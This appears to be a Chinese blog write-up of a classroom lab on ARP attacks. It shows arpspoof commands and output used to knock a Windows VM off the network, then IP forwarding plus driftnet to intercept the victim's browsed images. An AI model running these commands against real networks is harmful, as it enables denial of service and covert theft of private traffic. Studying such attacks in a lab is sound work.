最后一节课进行了一次ARP攻击实战,主要是通过中间人进行攻击,截取Client/Server(CS)之间的信息。
所谓ARP攻击,就是伪造IP和MAC地址进行的攻击或者欺骗,但是ARP攻击和ARP欺骗应该是两个概念,ARP攻击所产生的效果就是使目标主机(当然这里默认的是局域网,倘若你处在外网,涉及到内网渗透,以后在具体说内网渗透)断网,这种行为从某种意义上来说是,是损人不利己的,因为攻击者并没有得到什么好处,只是让对方不能上网,但是如果在ARP攻击的基础上,通过嗅探对方的流量,非法获取一些隐私信息,那就大大不同了。
在虚拟机中开启两个系统,一个是Kali,另一个是受害者Windows7.windows7用户正常上网,利用Kali Linux进行一些攻击。
1.实验环境
软件 | 解释 |
---|---|
Kali Linux | IP:192.168.92.130 |
Windows Server 2008 R2 | IP:192.168.92.128 网关:192.168.92.2 |
2.arpspoof
此时,在Kali中使用arpspoof工具实现ARP攻击
命令: arpspoof –i eth0 –t 192.168.31.248 192.168.31.1
Eth0 后面跟的是要攻击的主机ip地址 ,最后的ip地址是网关.
-t 表示发送数据帧。
root@qzz:~# arpspoof -i eth0 -t 192.168.92.128 192.168.92.2
0:c:29:e:c3:9b 0:c:29:ba:ab:8 0806 42: arp reply 192.168.92.2 is-at 0:c:29:e:c3:9b
0:c:29:e:c3:9b 0:c:29:ba:ab:8 0806 42: arp reply 192.168.92.2 is-at 0:c:29:e:c3:9b
0:c:29:e:c3:9b 0:c:29:ba:ab:8 0806 42: arp reply 192.168.92.2 is-at 0:c:29:e:c3:9b
这个时候表示成功,此时另一台虚拟机windows上不能上网。
将该攻击停止,windows又可以上网了。
3.ARP欺骗
首先,我们要使用的工具还是ARPSpoof,因为我们此次攻击方式是欺骗,同时,我们还是用Eteercap去嗅探目标靶子的流量,来获取目标的重要信息。
但是,首先要开始IP转发功能,linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward
中。默认为0,接下来修改为1.
修改转发命令:echo 1 >/proc/sys/net/ipv4/ip_forward
root@qzz:~# echo 1 >/proc/sys/net/ipv4/ip_forward
//进行查看
root@qzz:~# cat /proc/sys/net/ipv4/ip_forward
1
接下来我们开始arp欺骗。依然使用arpspoof
命令如下:arpspoof –i eth0 –t 192.168.31.248 192.168.31.1
前面的ip是要欺骗的ip地址,后面是网关的ip地址,目的是告诉
Win-7主机 网关现在是我。
欺骗成功以后,开始窃取windows上网浏览图片信息。
命令如下:driftnet –ieth0
(重新打开一个命令行,arp欺骗不要停止)
root@qzz:~# driftnet -ieth0
二 7月 09 09:29:32 2019 [driftnet] warning: image data too small (35 bytes) to bother with
这个时候会弹出一个窗口,那么在windows看到的图片在这个窗口里都会收集起来。
本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!